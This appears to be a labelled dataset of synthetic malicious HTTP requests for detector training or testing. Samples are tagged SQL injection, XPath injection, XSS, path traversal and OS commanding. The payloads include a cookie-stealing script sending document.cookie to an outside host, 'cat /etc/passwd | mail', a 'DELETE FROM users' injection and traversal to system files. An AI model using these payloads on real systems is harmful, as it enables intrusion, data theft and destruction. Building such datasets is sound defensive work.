Warning: 628 www.gpeent.gif "bdfniiksnrsxp" 
X-Forwarded-For: 254.13.104.181
X-Serial-Number: 80684101
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3f-QACfD6QGls=<bgsound  src=    "   javascript:[document.location.replace  ('http://www.atorlati.com/cgi-bin/roetch.cgi'+document.cookie);]   "    >&bsmo2=4300341199&88Kb7@OTsWOf=006&eg=hcM&eretTba=fOnzooyG&aifhmmokfnaey=fl6on2i6okn&iwttT10=mha9uJecoubla3ehk&zu=2oiEakisgehnEi

End - Id: 46802
Start - Id: 42924
class: OsCommanding
GET /oau-0Bht/hgsszK03y7M/syXu2/rtN-YeIyaAjC.php3?llhhsoozas15=enMeiet&eaebht=psteo&xighvatehleBgoe=565950&otxevnjr5n=mr%3Cpasswd%5C&H4iZQW=81090021&hz8habicwnojft=hreu&Fbd3fE=plasg HTTP/1.1
Host: www.e0iiTmayN.gov:43
Connection: gorHwr
Accept: */*;q=0.5
Accept-Charset: iso-8859-1, x-mac-arabic
Accept-Encoding: *;q=0.5
Accept-Language: oops    ;cat    /etc/passwd  |    mail your@ei.com
Cache-Control: no-transform
Client-ip: 22.171.202.170
Cookie: neiym=72669002;aaedw7st=d$ naeru)ri<dy;evif3rqoe8a=osz il1aq7o+;gafpdth=CtzolaolinkoAt<ef;M3FZ_=(m
Cookie2: $Version="1"
Date: Mon, 28 Dec 09 10:43:49 CET
ETag: "5E.6ZDTdRKI89MzLURL"
Expect: 100-continue
From: oIteteaa@odaSo1YA.it
If-Modified-Since: Fri, 21 Jul 06 19:58:19 CET
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "aFDfvF5YOZqBL6AG"
If-None-Match: "3nCfw4UONXfj@0duRL"
If-Range: "vkwISyJp_eMW5fz5aE"
Max-Forwards: 2812
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic QWdkZWhUZzpoZUxvV3U=
Authorization: at5tn Dmlme=OlAtaNK
Range: 3-6521,8-,9454-87196
Referer: http://www.sdktoath.org/mwIlS.asp
TE: gzip,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: C1IAsOnaUgesOu
UA-CPU: Sparc
UA-Disp: 3828,378,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0091x1254
Via: 4.3 48.242.64.201
Transfer-Encoding: identity
Upgrade: olEofa/6.2, 8uc/9.8, mieh/1.6
Warning: 517 www.n1shrm.shtml "Ssehtmlmsep" "Sun, 25 Jul 04 01:49:30 GMT"
X-Forwarded-For: 15.151.59.253
X-Serial-Number: 740578265962
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42924
Start - Id: 48758
class: XPathInjection
GET /08ChuttSf0P/2eahuue/aso5Wi4d1cerli/nGjlkUsHbssI8Qxv/ym_RBRuZWsmA1yC/oHeobxsx.shtml?6WaPvnsndxbMex=Iut%27+or+eo9uw%2FcmEm%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D8%5D+or+%27dtE1%27%3D%27&dehaRdlayephaea=59&FNEVdb3etcwhtmp8=TARlg8+edropar HTTP/1.1
Host: www.birr.com:7
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic;q=0.5, windows-1254
Accept-Encoding: 
Accept-Language: ssiuadIt-gecan8Ni;q=0.9
Cache-Control: max-stale=62355
Client-ip: 29.90.247.5
Cookie: LaomelsduojRbo=eposition3>uianddhtn a;i4temxtsse=ban;tjsetbeVjeotei=ae;ciRti1e3tnc= foot&os
Cookie2: $Version="80"
Date: Thu, 22 Oct 09 08:10:32 CET
ETag: W/"I@hAWbaTz@D0WI_DL5"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Sat, 25 Jun 05 24:33:31 CET
If-Unmodified-Since: Fri, 02 Jul 04 17:23:40 UTC
If-Match: *
If-None-Match: "Xw_SS_rfttntfSCuV"
If-Range: *
Max-Forwards: 98
MIME-Version: 2.5
Pragma: eaar=e
Proxy-Authorization: Digest uri=http://is55.st/Tmradind/rpos/lestr.pl
Authorization: Digest cnonce="fEhiol"
Range: -26
Referer: /srievoew/mocarrt/a1hri/b2oca.js
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: oA1ryil/4.0.5.2.0
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: hDzyep/5.5 189.152.160.71:57
Transfer-Encoding: deflate
Upgrade: npelr/9.1, ir3/9.6, trmYd/3.9, egD/1.4, hafn8/5.0
Warning: 532 201.121.16.113:0328 "sow6hi3ltE" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48758
Start - Id: 42062
class: SqlInjection
GET /txlHuIRQJyh7processing-instruction/icCwTC9Lrk9QCg-a80nh/nu/iIrlogeres/hWG_dGLW/r20b_r07puI88cN/rQXi@Zka@xhejahJEhC/wIYukJuQSXenXq.Rb0c/mdihAtLe/qiiMedpzrseht.html?aty=rzdf%27++%29%3B+DEL%2F**%2FETE++++FROM+++users+++++WHERE++upper%28username%29+%3D+upper%28%27admin&cJ@x=xtermrn%7Cfo5ewae&6oe=e3s&bdfap0ce2n4are=88680 HTTP/1.1
Host: 165.187.45.236
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-6;q=0.4, windows-874, x-mac-chinesetrad;q=0.6, x-mac-korean;q=0.3, x-mac-turkish
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 154.191.132.233
Cookie: lrt0NSarsahreO=o0ddD)eAi3e;6eaLbdetti3=7322632;gl=000033411
Cookie2: $Version="58"
Date: Sat, 25 Mar 06 05:37:20 UTC
ETag: W/"0OzoIBhLz0TEHDP7"
Expect: dntttuy
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Thu, 31 Jul 08 15:42:21 GMT
If-Unmodified-Since: Wed, 28 Apr 10 03:54:51 GMT
If-Match: "QSIELTZnj.FcldZLR"
If-None-Match: *
If-Range: "w5RYOz85gXktcR8g"
Max-Forwards: 3607
MIME-Version: 0.9
Pragma: b='obv'
Proxy-Authorization: Basic c3VubzpuZWdhZA==
Authorization: Basic cmVhZWllbW46UnNuY0llYQ==
Range: -99729
Referer: http://ahyq.de/u2rhl/rwtdoInn/ehser/yE5t.dll
TE: deflate,trailers,trailers
Trailer: Range
User-Agent: EnsBonrne/8.2.2
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9544x100
Via: 9.8 150.228.124.21:5337, HTTP/1.6 www.emooteM.png
Transfer-Encoding: compress
Upgrade: Ens/2.7, ieoa/3.9, 4tt/2.8, ind/4.0, sute/1.0
Warning: 264 99.10.30.250 "a0gtsj1ecytcw5Eqrc" 
X-Forwarded-For: 206.224.167.230
X-Serial-Number: 001394948859071824
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42062
Start - Id: 48337
class: XPathInjection
GET /lrsheepoeg/D@vzQ/Xmeta3ETYUpsVls/or4owod7qm/qetizasOr/a3iidnyqrPntj/Cxp_Ww_.pl? HTTP/1.0
Host: www.oAoommn.com:6570
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: iso-8859-8;q=0.3, iso-2022-kr, x-mac-chinesetrad, windows-1252;q=0.3
Accept-Encoding: 8dahe2tk'  or  ih/lo/child::node()[processing-instruction()=1]  or    'ahlsesad'    =    '
Accept-Language: sit-cd, tqee-rl7u7tt;q=0.4, 6-ch7Dtl, e6elIg-tethentD;q=0.4, rSnt-7;q=0.6
Cache-Control: no-cache
Client-ip: 200.211.226.108
Cookie: ieoaRstwDai=eunion g @;httpQ8t5Kprocessing-instructionOscriptQ=eus;e9mF=oqenocaIn7oincludeh1 psystem/e;eaensimcseesg=aAv
Cookie2: $Version="50"
Date: Sun, 11 Apr 04 21:48:10 CET
ETag: W/"imjZvWN0w46MgICT"
Expect: 100-continue
From: eubmr8po@lWep.cz
If-Modified-Since: Mon, 09 Jan 06 10:32:56 CET
If-Unmodified-Since: Thu, 21 Jul 05 11:30:04 UTC
If-Match: *
If-None-Match: "gLAXQmijNbpR3aS"
If-Range: "aoc4eJVcY4XWcO-"
Max-Forwards: 549
MIME-Version: 8.0
Pragma: apuojm='3ersw1'
Proxy-Authorization: Basic QXRkbXJhbjU6bnRvdA==
Authorization: Digest nc=EFd9edCD
Range: 1201-6,062085-441
Referer: /7Hoo/f3heni.gif
TE: trailers,deflate;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.2 (Windows; U; WinNT 6.3; yh-nm; rv:1.2.7) Gecko/63485341
UA-CPU: Sparc
UA-Disp: 202,739,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 433x249
Via: HTTP/5.7 www.se0e.css
Transfer-Encoding: deflate
Upgrade: eta/7.4, auRa/8.4
Warning: 936 www.ew9sLHSe.html "otReepcbaeheiessidy" "Tue, 04 May 10 22:09:47 UTC"
X-Forwarded-For: 162.179.117.235
X-Serial-Number: 6875195
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 48337
Start - Id: 42305
class: SqlInjection
GET /4uyatoett6evgt7/nL7bAb8t/rtbjwdl75g/jI5iparsttTskySs/KR9/BKprocessing-instructiond/i3hhnA/ekggswasLshmtq3w/Eap6as/nieiaiSi5wfshft.tiff?Dppsp5ttn=5798229&onmnietmrb=av&brL8Q8yRM0j=yhe92a&qbip=515113&neTreelTowti=5055&.OHwhereshutdownMeT=551864&tAcenIgssy3aaet=91482&yemok=neat1&SUw.05kJYm=%27+++++or+++id++in++++%28++select+++*++from+++user_db+%29&HsFesambinU=02&se=80772444&gtInibo=fa HTTP/1.0
Host: 65.213.60.150:80
Connection: eriiite
Accept: application/*;q=0.5, text/*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: hmsjc-me;q=0.0, isnn-fykcssln;q=0.3, rhO-l, iestre-8a7payl;q=0.0
Cache-Control: max-age=53471
Client-ip: 37.43.143.81
Cookie: 1st1tFdska=iiumesIe;nkedcaytni7a=ddadmin;Enro1f=5;ndimam4dubT=odabme cs;ccgj5t=e0v
Cookie2: $Version="871"
Date: Wed, 22 Dec 04 16:11:42 UTC
ETag: "NrIBh7YV-x.@lBq@zb"
Expect: eSOo=Euhs
From: ebsew@sn8ns6e.de
If-Modified-Since: Sun, 19 Sep 04 19:46:45 GMT
If-Unmodified-Since: Wed, 06 Oct 04 06:18:07 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Oct 04 24:38:59 GMT
Max-Forwards: 2
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: NTLM aTZzY3QzcnVzNG1zbHpSQWRwb2V0c2tvNWVjdG50bHJsb01H
Authorization: Digest qop=yewizi
Range: -568889,-588214
Referer: /serh/dyam/haa9z76.htm
TE: deflate;q=0.8
Trailer: If-Range
User-Agent: Tsulnf/3.6.9.3.9
UA-CPU: Sparc
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4371x6437
Via: ciay/1.9 www.ifeK.html
Transfer-Encoding: deflate
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 74.6.222.203
X-Serial-Number: 807714416153290560
----: -------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42305
Start - Id: 48946
class: XPathInjection
GET /jH84Crfvwo.tiff?fetuteFpUlsb4la=3553+++or+++++igaed%2Faddgr%2FduUoo5%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D669%5D++++or++41%3D&uimn=eiClL3&adifvs2ioy0=4&eoblml=bo&esmel=xiyeoiHeot2rhsWu&evuci6=iteyxle&biErde0ciiuok=tuPjR0ITase HTTP/1.1
Host: www.dehtDi.cz
Connection: pndAli8
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=004
Client-ip: 208.68.234.50
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Fri, 24 Apr 09 23:38:28 CET
ETag: "i8pw8MiXbYxDFs-"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Tue, 26 Feb 08 09:08:50 CET
If-Unmodified-Since: Sat, 28 May 05 08:29:09 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Aug 06 17:40:55 UTC
Max-Forwards: 120
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: NTLM OWFoNm51aXR0c3Q5Y25yOWlhdHJzbWlzZWhhc2VOaTBlcw==
Range: 326-470558,-0121
Referer: /tmpme/Seel.png
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/3.5 (Machintosh; U; Mac OS X 3.4; 6a-cj; rv:8.7.7) Gecko/88052770
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 508x349
Via: ieugo/6.8 www.Tos7pO.js, 2.5 www.islun.tiff, ogpsx/1.4 www.iacLnt.png:0
Transfer-Encoding: compress
Upgrade: neho/9.5, zih7sw/6.0, yitr/8.3, e0e6er/6.0
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48946
Start - Id: 45905
class: PathTransversal
GET /jAa4nmfczvEauhmH4hb/leU5d2bmr-u/nezspwAdhRiDag9ars/gG6sc/eUiwKDZs9zbbgYmcK/s3eMrFY/6tim35/d0_BRAWH5U5GHFB.css?Eb5group byGeWZ.=utnnc&troecSd=p%3A%5Cautoexec.bat&tohOsleFnore=s-tA7bH&eNh5i0e=e%24cy&uesediers846i=H%3E7hA&hexa=9337&sjeRt=bp5T8KN&iseh3Tn6lriI=hhUdP9o&ua2=v1i&87nen=xeaspe+ue2s&ecipsprmtga=Yhaa%5Cna HTTP/1.1
Host: www.aoke.cz:80
Connection: ni2e
Accept: image/*
Accept-Charset: us-ascii
Accept-Encoding: *
Accept-Language: jR1tnmp5-8n7o, TfnREtli-krirdia7, w5tT-e;q=0.9
Cache-Control: no-store
Client-ip: 132.53.138.134
Cookie: 1al2Rbqyr=yEub;ooLal8shtph=931;Dwyatplyeu7netM=eacopy7ce0;4m62phttpiJpVBq=40880;slneetOte7ayoa8=yuJcKFK;aFtatenhlS=xzte
Cookie2: $Version="43"
Date: Sun, 07 Aug 05 13:19:10 CET
ETag: "I5Zacwl6TPqEQ2Zm"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 02 Jul 08 18:55:36 UTC
If-Unmodified-Since: Tue, 17 Feb 04 03:08:23 CET
If-Match: *
If-None-Match: *
If-Range: "a2qF-nVeSjK-zTm"
Max-Forwards: 1583
MIME-Version: 4.5
Pragma: p='aromn'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Basic ZWM4aWE6b2VyMVMyZQ==
Range: 2-4458,00-
Referer: /wgoBopoe/oxeai/bupzta/mtwlLhze.tiff
TE: trailers,chunked
Trailer: If-Range
User-Agent: e6JE22 http://www.aaJwe.biz
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: FTP/9.3 www.5zinw.gif
Transfer-Encoding: gzip
Upgrade: 9sy/9.0, apeda/8.6, mmS3/2.1
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 205.145.84.10
X-Serial-Number: 7456585947858
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45905
Start - Id: 47941
class: XSS
GET /6y8/lpositionjTAiE2/fV-OfWdfc/asznretnincG/l-WxzrUQQ/6k/haa0raetrla5smteoZe/2b/gfiksoewuneae1st/kuP0pN0AaX3VA/-Gb_@Ls5fB/aHZn7Di-8hKx.css?weEabAetyTR=deleteyi&t9se=95&ECf4e=yeDni&K0S191@DLbody2=%3Cdiv++style+++%3D%22+behaviour%3A+++++url%28%5Bhttp%3A%2F%2Fwww.gesill.com%2Fscript%2Fi93nib5nu.asp%5D%29%3B++%22++%3E&KTiiqsmea8rhu=rhUL&tLhoa=3630&peTulneteheEez=6406516&7.yk8=mroUj6tANGR&iit=tnc&4ilcner=yeedaptmbfbggTo&9Js9KgCyK3=e%2Bhtaccesn7%7CEfl&tinheGhieitrt=6kesn%2F&te=cps1&4Eanotj=keo HTTP/1.0
Host: www.tsdhYNl6.com
Connection: close
Accept: video/quicktime;q=0.0, video/mpeg;q=0.1
Accept-Charset: utf-7;q=0.2, iso-2022-jp;q=0.0
Accept-Encoding: *
Accept-Language: t9-sooyrn2;q=0.4, c-p7dGyaMA, t-1, mun2efr-bdenP4oh, mlerpix-nap9r;q=0.4
Cache-Control: no-cache
Client-ip: 55.58.52.249
Cookie: nt9KesgSRrP=swH6A;osu5iysuo=441;esrsAtr90dig=2150;ewoystsC8us=iAonebiagrhtqe3r
Cookie2: $Version="16"
Date: Fri, 14 Sep 07 04:23:26 UTC
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Wed, 08 Nov 06 17:51:17 GMT
If-Unmodified-Since: Thu, 30 Nov 06 09:40:01 CET
If-Match: "_@TaipZZGQ5OuW1tZM"
If-None-Match: *
If-Range: Tue, 04 Mar 08 04:52:56 UTC
Max-Forwards: 1269
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: NTLM Q2J0c25nczVSb2VMb3NvdHJkOHJpTkUzZWVwYXRlaUM5b3Nub3ZvdQ==
Range: 44-,8-
Referer: /aomnrh/C6sH/Ctsihr/1epea2ea/soeh.cgi
TE: gzip
Trailer: Max-Forwards
User-Agent: nezseoihsi/8.9.9
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 929x206
Via: FTP/4.0 149.105.135.90, 0.7 164.104.37.26:6744, 6.4 223.146.211.255:59505
Transfer-Encoding: compress
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 608 117.63.178.23 "ioeihi" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47941
Start - Id: 48837
class: XPathInjection
GET /iCYYLg9QkqoqRJ/megddlebeedres.jpg?rt0vate5r=se%27++or++++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+++i%2B++++j++++%2B+k++++%2B++l+%2B1%29%5D+%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++%27hn%27%3D+++%27+++++Dsi1ua%27+++or HTTP/1.1
Host: 87.107.186.132:88228
Connection: onmM0a
Accept: */*
Accept-Charset: x-mac-turkish, x-mac-ce;q=0.2
Accept-Encoding: compress;q=0.2, identity;q=0.3, compress, deflate
Accept-Language: oa-thEhg9S;q=0.7
Cache-Control: min-fresh=07921
Client-ip: 23.135.69.55
Cookie: 6lanoEgce5tee=ocinullt;liu7=%;mwo=Lm
Cookie2: $Version="84"
Date: Sat, 01 Dec 07 01:03:40 CET
ETag: W/"avJZH_WOE6_-E78DqOa"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Fri, 21 Nov 08 06:18:53 GMT
If-Unmodified-Since: Sat, 09 May 09 21:16:51 GMT
If-Match: *
If-None-Match: "MrwIIj4t5uVwxU8o"
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 251
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: NTLM bWtubWFubFRlZ2NobjI0Z2hvYXNpcnNhZWF3clJpMXdlZW1laXFhd09uN3NldWVv
Range: 809589-,06-
Referer: /iolAa.tar.gz
TE: trailers,gzip;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/5.3 (X11; U; Open BSD i386 1.0; is-rg; rv:1.0.4) Gecko/25261303
UA-CPU: StrongARM
UA-Disp: 5906,9544,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 2.1 www.vsovh5.shtml:1660, FTP/8.5 www.fmEet.js
Transfer-Encoding: gzip
Upgrade: qdiue/5.0
Warning: 633 188.14.137.244 "aosw5Aneiu" 
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 177199337529573688
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 48837
Start - Id: 42427
class: SqlInjection
GET /_o/eKlmux/o9-9tBpjlh4buD/SWa4KautoexecFLbetweenyA6eR.jpeg?na1msRragm=hetEp2lrmees2st&jIzbtnx82ohu=ohe&wnph-eWTscriptGA=1928064574&t7eitidhsuFyNeu=oa%3Dlog&tTwEzzd7h=gueh&hoo7unta7l=3500&e14=wp-wp&a1mnnfahtrtLr=tnNd&ewp=%27+++OR+++++%27%27+++%3D+%27&le=995896581 HTTP/1.0
Host: 168.242.9.226
Connection: sRdl
Accept: */*
Accept-Charset: iso-8859-8-i, iso-8859-6, utf-8;q=0.7, x-mac-hebrew, iso-10646-ucs-2
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 28.141.41.185
Cookie: hl=d2wteffl;9XP@M2J@cconnectW=oiyab;areh=Eenwn2zwsnrtwhsni
Cookie2: $Version="157"
Date: Tue, 27 May 08 18:54:58 GMT
ETag: W/"ROs81ENXsNKrraDFF"
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Tue, 26 Aug 08 24:53:27 GMT
If-Unmodified-Since: Sat, 05 Sep 09 22:55:30 UTC
If-Match: "Asx8P9sbgCYJnT."
If-None-Match: "gXheTBCAIWNh3EkZ6"
If-Range: *
Max-Forwards: 958
MIME-Version: 0.1
Pragma: d=tcuG
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM QWVjdHRpUmU4cm9Mc3Zlc3RIZW9JZWYxM3N0bGVlbmdhYnNF
Range: 005696-6624,4-
Referer: /r7h0LTe/eqim/femmp.htm
TE: gzip;q=0.9,chunked,deflate;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/3.1 (X11; U; Open BSD i586 5.5; zb-i2; rv:6.2.8) Gecko/20143208
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6539x2749
Via: 6.5 207.97.59.250:4611
Transfer-Encoding: eseqa
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42427
Start - Id: 41265
class: SqlInjection
GET /tijaenbteieiel/mrdLkaw4E/d0p6s_XmI1./e6CBchIv/BMGaSXnodeh-/6dte/nWaZfNNDR.php? HTTP/1.1
Host: 45.124.157.83
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rtaGe-h9mi7uSa, io-had;q=0.3, na-qmi8Ten0;q=0.5
Cache-Control: no-cache
Client-ip: 128.207.222.170
Cookie: OlrwhwdEeO6s=OR     '2icasr' =  '  ';yeElaie=fhoao]m-ain3qsf
Cookie2: $Version="86"
Date: Sat, 11 Apr 09 06:27:23 GMT
ETag: "YU.-mZa1YnFs1@1.Um"
Expect: 100-continue
From: sadkb6h@raise.cz
If-Modified-Since: Wed, 12 Dec 07 05:26:22 UTC
If-Unmodified-Since: Sun, 30 Jul 06 04:30:35 UTC
If-Match: "jkx9nvTegIvEZ15F5"
If-None-Match: "buP_y3FE4cCs-O64"
If-Range: "hWsv53L9kvPd0dP8"
Max-Forwards: 4
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest username="htctmgeT"
Authorization: Digest realm
Range: 5-,-39261
Referer: http://www.h5eT.biz/hWNr5at/Ed3aaur/Tirvbker/altlevow/Hefsr.dll
TE: trailers,trailers,chunked
Trailer: Max-Forwards
User-Agent: bapq (tt0pa1; nNmTak9H57)
UA-OS: Win9x
UA-Pixels: 557x1445
Via: 5.0 www.ue4f.jpeg, Ltpan/8.9 221.222.147.104, 7.1 131.252.78.244
Transfer-Encoding: deflate
Upgrade: iyhnr/0.0, awhact/3.4, e1delp/1.8, 3goK/3.2, deeso/8.6
Warning: 498 21.33.208.241 "hoInidscriwhfxr" "Wed, 09 Dec 09 01:18:48 CET"
X-Forwarded-For: 31.90.227.178
X-Serial-Number: 2028120
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41265
Start - Id: 45741
class: PathTransversal
GET /a4kvOj6ZgoHs5X2a/ikaJc3SZBkA8D/bzk14B15B6/SidsgeEnie.jpeg?eCuO=hK&xws6ju=%5CWINNT%5Csystem.ini&Nbcgghelah=5&1enc=t4a1&oMhEtqIs9sqih=%25yPe%3F&hat=ftTs2afNptpmdtR&wapeolhelsszA=e9 HTTP/1.0
Host: www.pnbREEei.gov
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, gzip;q=0.8, identity;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 172.160.2.55
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Fri, 07 Jan 05 23:29:31 GMT
ETag: W/"MmZYP5uH2Z8Y7FOUG_"
Expect: a3ieu
From: eyebc4et@nriRuu.de
If-Modified-Since: Sat, 03 Sep 05 09:02:23 CET
If-Unmodified-Since: Wed, 13 Jan 10 04:52:02 UTC
If-Match: "bLbXfUfEmhZKj7Kq3"
If-None-Match: "GbAVIE@s-Vfjv0j"
If-Range: "DOB0sUVqtvkbHIw"
Max-Forwards: 2
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: NTLM b243Y2FxbmlhamUyYWZlaGZocGthdWFTbnNodHdSa2owc3RjaHJhbg==
Range: -500252,934-3694
Referer: http://rndtl.st/Do0i.htm
TE: gzip;q=0.5,deflate;q=0.0
Trailer: User-Agent
User-Agent: qtal2Nixwzoen
UA-CPU: Sparc
UA-Disp: 797,3668,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: HTTP/7.3 152.107.181.213, 1.6 www.ooynE4sM.gif, 3.6 154.120.161.205:5
Transfer-Encoding: Iyys; d6endwv=tx0d
Upgrade: 8ohae/0.1, hh7/2.7
Warning: 198 5.109.101.104 "kAoaslle" 
X-Forwarded-For: 187.241.210.252
X-Serial-Number: 3591562194850483
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45741
Start - Id: 45153
class: PathTransversal
GET /../../? HTTP/1.1
Host: 113.77.56.209
Connection: ehipecon
Accept: audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: rJsti-kT
Cache-Control: max-stale
Client-ip: 240.134.41.171
Cookie: 4enmasdiasie6=6656370;-f0sI5=awh6oaleISo;Ge6dC=9ffnnckstoeoa;seirsletakqltl=mlpnrnrdene;sehjSrlh=38493127;tn3sysnedpolfT=ungmESX
Cookie2: $Version="70"
Date: Mon, 14 Sep 09 06:51:22 UTC
ETag: W/"2uLOqwwjMV7@@zGB"
Expect: sIseObpe
From: hdOf9re@eutwEh.uk
If-Modified-Since: Mon, 01 Nov 04 12:21:46 GMT
If-Unmodified-Since: Fri, 18 Feb 05 14:07:59 UTC
If-Match: *
If-None-Match: *
If-Range: "gH_j27C.9VSEB-a6yC"
Max-Forwards: 9680
Pragma: no-cache
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: NTLM Nm9uZ3pybHUyYWZwOXJvQWtPaTdrcmdzb2ZlYTJ1ZDdENEN0ag==
Referer: /sslOj.jsp
TE: chunked;q=0.7,deflate;q=0.6
Trailer: Host
User-Agent: Mozilla/1.8 (X11; U; Solaris 4.2; tt-tr; rv:8.6.2) Gecko/61674270
UA-Disp: 991,007,8
Via: 6.8 www.lsreEs5r.html:547
Transfer-Encoding: identity
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
Warning: 845 www.yohtvu.htm:3657 "hi7s4a" 
X-Forwarded-For: 249.70.128.210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45153
Start - Id: 39333
class: SSI
